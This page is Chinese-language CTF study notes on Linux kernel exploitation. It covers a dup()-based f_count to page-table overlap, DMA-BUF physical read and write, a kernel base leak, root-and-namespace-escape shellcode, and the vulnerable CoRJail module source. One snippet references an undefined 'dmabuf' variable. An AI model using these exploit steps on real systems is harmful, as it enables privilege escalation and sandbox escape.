> For the complete documentation index, see [llms.txt](https://lightc.gitbook.io/pwn-gitbook/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://lightc.gitbook.io/pwn-gitbook/kpwn/kpwn-tricks/wen-jian-jie-gou-yu-pte-li-yong.md).

# 文件结构与PTE利用

**exploitation for a file structure**

利用文件结构进行攻击比较困难，因为可供控制的字段很少，不过可以使用dup的方法

[fs.h - include/linux/fs.h - Linux source code v7.0.10 - Bootlin Elixir Cross Referencer](https://elixir.bootlin.com/linux/v7.0.10/source/include/linux/fs.h#L1231)

```c
struct file {
    union {
        struct llist_node  f_llist;
        struct rcu_head    f_rcuhead;
        unsigned int      f_iocb_flags;
    };
    /*
    * Protects f_ep, f_flags.
    * Must not be taken from IRQ context.
    */
    spinlock_t      f_lock;
    fmode_t         f_mode;
    atomic_long_t       f_count;
    struct mutex       f_pos_lock;
```

f\_count表示文件对象的引用计数，使用dup系统调用来复制文件描述符时该计数会增加，PTE指针会递增

调用dup 0x1000次，PTE中f\_count对应位置的条目将指向下一页，从而使两个PTE中的条目指向同一物理地址

经过此次修改，尝试读取每个页面并检查页面中写入的数据是否发生变化，从而找到overlapping page

```c
/**
   * 4. Modify PTE entry to overlap 2 physical pages
   */
  // Increment physical address
  for (int i = 0; i < 0x1000; i++)
    if (dup(ezfd) < 0)
      fatal("dup");
  puts("[+] Searching for overlapping page...");
  // Search for page that overlaps with other physical page
  void *evil = NULL;
  for (int i = 0; i < N_PAGESPRAY; i++) {
    // We wrote 'H'(='A'+7) but if it changes the PTE overlaps with the file
    if (*(char*)(page_spray[i] + 7*0x1000) != 'A' + 7) { // +38h: f_count
      evil = page_spray[i] + 0x7000;
      printf("[+] Found overlapping page: %p\n", evil);
      break;
    }
  }
  if (evil == NULL) fatal("target not found :(");
```

这样就会造成两个用户态虚拟地址指向同一个物理地址，这样我们就可以找到可以篡改PTE的用户态虚拟地址

用户态与内核态物理内存之间存在距离，可以使用 DMA-BUF 堆（ `io_uring` 由于 nsjail 的限制无法使用）

DMA-BUF是一种用于多设备间快速安全访问的内存，可以通过`/dev/dma_heap/system`打开DMA设备来控制DMA-BUF堆，通过调用`DMA_HEAP_IOCTL_ALLOC`可以分配一块可映射到用户空间的内存

通过此IOCTL映射的页面将被分配在靠近PTE的物理内存上

如果准备一个DMA-BUF堆页面作为PTE条目，并利用f\_count对其篡改

因为我们已经直到哪个用户态页面可以破坏PTE，对其munmap后对DMA-BUF堆页面执行mmap操作，使f\_count与DMA-BUF堆页面的PTE条目重叠

关键在于，DMA-BUF堆分配页旁边存在一个PTE，再次dup 0x1000 来递增f\_count，映射到用户空间的DMA-BUF堆页将指向该页表

通过读写映射到用户空间的DMA-BUF页，就可以控制PTE，通过修改PTE的条目，使其某个条目指向任意地址

```c
/**
   * 3. Overlap UAF file with PTE
   */
  puts("[+] Allocating PTEs...");
  // Allocate many PTEs (1)
  for (int i = 0; i < N_PAGESPRAY/2; i++)
    for (int j = 0; j < 8; j++)
      *(char*)(page_spray[i] + j*0x1000) = 'A' + j;
  // Allocate DMA-BUF heap
  int dma_buf_fd = -1;
  struct dma_heap_allocation_data data;
  data.len = 0x1000;
  data.fd_flags = O_RDWR;
  data.heap_flags = 0;
  data.fd = 0;
  if (ioctl(dmafd, DMA_HEAP_IOCTL_ALLOC, &data) < 0)
    fatal("DMA_HEAP_IOCTL_ALLOC");
  printf("[+] dma_buf_fd: %d\n", dma_buf_fd = data.fd);
  // Allocate many PTEs (2)
  for (int i = N_PAGESPRAY/2; i < N_PAGESPRAY; i++)
    for (int j = 0; j < 8; j++)
      *(char*)(page_spray[i] + j*0x1000) = 'A' + j;
  /**
   * 4. Modify PTE entry to overlap 2 physical pages
   */
  // Increment physical address
  for (int i = 0; i < 0x1000; i++)
    if (dup(ezfd) < 0)
      fatal("dup");
  puts("[+] Searching for overlapping page...");
  // Search for page that overlaps with other physical page
  void *evil = NULL;
  for (int i = 0; i < N_PAGESPRAY; i++) {
    // We wrote 'H'(='A'+7) but if it changes the PTE overlaps with the file
    if (*(char*)(page_spray[i] + 7*0x1000) != 'A' + 7) { // +38h: f_count
      evil = page_spray[i] + 0x7000;
      printf("[+] Found overlapping page: %p\n", evil);
      break;
    }
  }
  if (evil == NULL) fatal("target not found :(");
  // Place PTE entry for DMA buffer onto controllable PTE
  puts("[+] Remapping...");
  munmap(evil, 0x1000);
  void *dma = mmap(evil, 0x1000, PROT_READ | PROT_WRITE,
                   MAP_SHARED | MAP_POPULATE, dma_buf_fd, 0);
  *(char*)dma = '0';
  /**
   * Get physical AAR/AAW
   */
  // Corrupt physical address of DMA-BUF
  for (int i = 0; i < 0x1000; i++)
    if (dup(ezfd) < 0)
      fatal("dup");
  printf("[+] DMA-BUF now points to PTE: 0x%016lx\n", *(size_t*)dmabuf);
```

仍有一些固定的物理地址

```
0x00007ffd333c7000-0x00007ffd333c8000 0x000000013af20000-0x000000013af20000 0x1000
0xffff93ee40000000-0xffff93ee40098000 0x0000000000000000-0x0000000000098000 0x98000
0xffff93ee40098000-0xffff93ee40099000 0x0000000000098000-0x0000000000099000 0x1000
0xffff93ee40099000-0xffff93ee4009b000 0x0000000000099000-0x000000000009b000 0x2000
0xffff93ee4009b000-0xffff93ee40200000 0x000000000009b000-0x0000000000200000 0x165000
0xffff93ee40200000-0xffff93eeeea00000 0x0000000000200000-0x00000000aea00000 0xae800000
```

对应

```c
  // Leak kernel physical base
  void *wwwbuf = NULL;
  *(size_t*)dmabuf = 0x800000000009c067;
  for (int i = 0; i < N_PAGESPRAY; i++) {
    if (page_spray[i] == evil) continue;
    if (*(size_t*)page_spray[i] > 0xffff) {
      wwwbuf = page_spray[i];
      printf("[+] Found victim page table: %p\n", wwwbuf);
      break;
    }
  }
  size_t phys_base = ((*(size_t*)wwwbuf) & ~0xfff) - 0x1c04000;
  printf("[+] Physical kernel base address: 0x%016lx\n", phys_base);
```

**nsjail逃逸**

利用物理内存任意地址写AAW原语，使用shellcode覆盖linux内核中某个随机函数的机器码，symlink函数的do\_symlinkat

```c
  init_cred         equ 0x1445ed8
  commit_creds      equ 0x00ae620
  find_task_by_vpid equ 0x00a3750
  init_nsproxy      equ 0x1445ce0
  switch_task_namespaces equ 0x00ac140
  init_fs                equ 0x1538248
  copy_fs_struct         equ 0x027f890
  kpti_bypass            equ 0x0c00f41

_start:
  endbr64
  call a
a:
  pop r15
  sub r15, 0x24d4c9

  ; commit_creds(init_cred) [3]
  lea rdi, [r15 + init_cred]
  lea rax, [r15 + commit_creds]
  call rax

  ; task = find_task_by_vpid(1) [4]
  mov edi, 1
  lea rax, [r15 + find_task_by_vpid]
  call rax

  ; switch_task_namespaces(task, init_nsproxy) [5]
  mov rdi, rax
  lea rsi, [r15 + init_nsproxy]
  lea rax, [r15 + switch_task_namespaces]
  call rax

  ; new_fs = copy_fs_struct(init_fs) [6]
  lea rdi, [r15 + init_fs]
  lea rax, [r15 + copy_fs_struct]
  call rax
  mov rbx, rax

  ; current = find_task_by_vpid(getpid())
  mov rdi, 0x1111111111111111   ; will be fixed at runtime
  lea rax, [r15 + find_task_by_vpid]
  call rax

  ; current->fs = new_fs [8]
  mov [rax + 0x740], rbx

  ; kpti trampoline [9]
  xor eax, eax
  mov [rsp+0x00], rax
  mov [rsp+0x08], rax
  mov rax, 0x2222222222222222   ; win
  mov [rsp+0x10], rax
  mov rax, 0x3333333333333333   ; cs
  mov [rsp+0x18], rax
  mov rax, 0x4444444444444444   ; rflags
  mov [rsp+0x20], rax
  mov rax, 0x5555555555555555   ; stack
  mov [rsp+0x28], rax
  mov rax, 0x6666666666666666   ; ss
  mov [rsp+0x30], rax
  lea rax, [r15 + kpti_bypass]
  jmp rax

  int3
```

\[[corCTF 2022\] CoRJail: From Null Byte Overflow To Docker Escape Exploiting poll\_list Objects In The Linux Kernel](https://syst3mfailure.io/corjail/)

```c
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/slab.h>
#include <linux/types.h>
#include <linux/seq_file.h>
#include <trace/syscall.h>
#include <asm/syscall.h>
#include <asm/ftrace.h>

MODULE_AUTHOR("D3v17");
MODULE_LICENSE("GPL");

extern struct syscall_metadata *syscall_nr_to_meta(int nr);
extern const char *get_syscall_name(int syscall_nr);

static int get_syscall_nr(char *sc);
static int update_filter(char *syscalls);
static int cormon_proc_open(struct inode *inode, struct  file *file);
static ssize_t cormon_proc_write(struct file *file, const char __user *ubuf,size_t count, loff_t *ppos); 
static void *cormon_seq_start(struct seq_file *seqfile, loff_t *pos);
static void *cormon_seq_next(struct seq_file *seqfile, void *v, loff_t *pos);
static void cormon_seq_stop(struct seq_file *seqfile, void *v);
static int cormon_seq_show(struct seq_file *f, void *ppos);
static int init_procfs(void);
static void cleanup_procfs(void);

DECLARE_PER_CPU(u64[NR_syscalls], __per_cpu_syscall_count);

static uint8_t filter[NR_syscalls];
static struct proc_dir_entry *cormon;
static char initial_filter[] = "sys_execve,sys_execveat,sys_fork,sys_keyctl,sys_msgget,sys_msgrcv"                    
                                "sys_msgsnd,sys_poll,sys_ptrace,sys_setxattr,sys_unshare";


static const struct proc_ops cormon_proc_ops = {
    .proc_open  = cormon_proc_open,
    .proc_read  = seq_read,
    .proc_write = cormon_proc_write
};


static struct seq_operations cormon_seq_ops = {
    .start  = cormon_seq_start,
    .next   = cormon_seq_next,
    .stop   = cormon_seq_stop,
    .show   = cormon_seq_show
};


static int get_syscall_nr(char *sc)
{
    struct syscall_metadata *entry;
    int nr;

    for (nr = 0; nr < NR_syscalls; nr++)
    {
        entry = syscall_nr_to_meta(nr);

        if (!entry)
            continue;

        if (arch_syscall_match_sym_name(entry->name, sc))
            return nr;
    }

    return -EINVAL;
}


static int update_filter(char *syscalls)
{
    uint8_t new_filter[NR_syscalls] = { 0 };
    char *name;
    int nr;

    while ((name = strsep(&syscalls, ",")) != NULL || syscalls != NULL)
    {
        nr = get_syscall_nr(name);

        if (nr < 0)
        {
            printk(KERN_ERR "[CoRMon::Error] Invalid syscall: %s!\n", name);
            return -EINVAL;
        }

        new_filter[nr] = 1;
    }

    memcpy(filter, new_filter, sizeof(filter));

    return 0;
}


static int cormon_proc_open(struct inode *inode, struct  file *file)
{
    return seq_open(file, &cormon_seq_ops);
}


static ssize_t cormon_proc_write(struct file *file, const char __user *ubuf, size_t count, loff_t *ppos) 
{
    loff_t offset = *ppos;
    char *syscalls;
    size_t len;

    if (offset < 0)
        return -EINVAL;

    if (offset >= PAGE_SIZE || !count)
        return 0;

    len = count > PAGE_SIZE ? PAGE_SIZE - 1 : count;

    syscalls = kmalloc(PAGE_SIZE, GFP_ATOMIC);
    printk(KERN_INFO "[CoRMon::Debug] Syscalls @ %#llx\n", (uint64_t)syscalls);

    if (!syscalls)
    {
        printk(KERN_ERR "[CoRMon::Error] kmalloc() call failed!\n");
        return -ENOMEM;
    }

    if (copy_from_user(syscalls, ubuf, len))
    {
        printk(KERN_ERR "[CoRMon::Error] copy_from_user() call failed!\n");
        return -EFAULT;
    }

    syscalls[len] = '\x00';

    if (update_filter(syscalls))
    {
        kfree(syscalls);
        return -EINVAL;
    }

    kfree(syscalls);

    return count;
}


static void *cormon_seq_start(struct seq_file *s, loff_t *pos)
{
    return *pos > NR_syscalls ? NULL : pos;
}


static void *cormon_seq_next(struct seq_file *s, void *v, loff_t *pos)
{
    return (*pos)++ > NR_syscalls ? NULL : pos;
}


static void cormon_seq_stop(struct seq_file *s, void *v)
{
    return;
}


static int cormon_seq_show(struct seq_file *s, void *pos)
{
    loff_t nr = *(loff_t *)pos;
    const char *name;
    int i;

    if (nr == 0)
    {
        seq_putc(s, '\n');

        for_each_online_cpu(i)
            seq_printf(s, "%9s%d", "CPU", i);

        seq_printf(s, "\tSyscall (NR)\n\n");
    }

    if (filter[nr])
    {
        name = get_syscall_name(nr);

        if (!name)
            return 0;

        for_each_online_cpu(i)
            seq_printf(s, "%10llu", per_cpu(__per_cpu_syscall_count, i)[nr]);

        seq_printf(s, "\t%s (%lld)\n", name, nr);
    }

    if (nr == NR_syscalls)
        seq_putc(s, '\n');

    return 0;
}


static int init_procfs(void)
{
    printk(KERN_INFO "[CoRMon::Init] Initializing module...\n");

    cormon = proc_create("cormon", 0666, NULL, &cormon_proc_ops);

    if (!cormon)
    {
        printk(KERN_ERR "[CoRMon::Error] proc_create() call failed!\n");
        return -ENOMEM;
    }

    if (update_filter(initial_filter))
        return -EINVAL;

    printk(KERN_INFO "[CoRMon::Init] Initialization complete!\n");

    return 0;
}


static void cleanup_procfs(void)
{
    printk(KERN_INFO "[CoRMon::Exit] Cleaning up...\n");

    remove_proc_entry("cormon", NULL);

    printk(KERN_INFO "[CoRMon::Exit] Cleanup done, bye!\n");
}


module_init(init_procfs);
module_exit(cleanup_procfs);
```
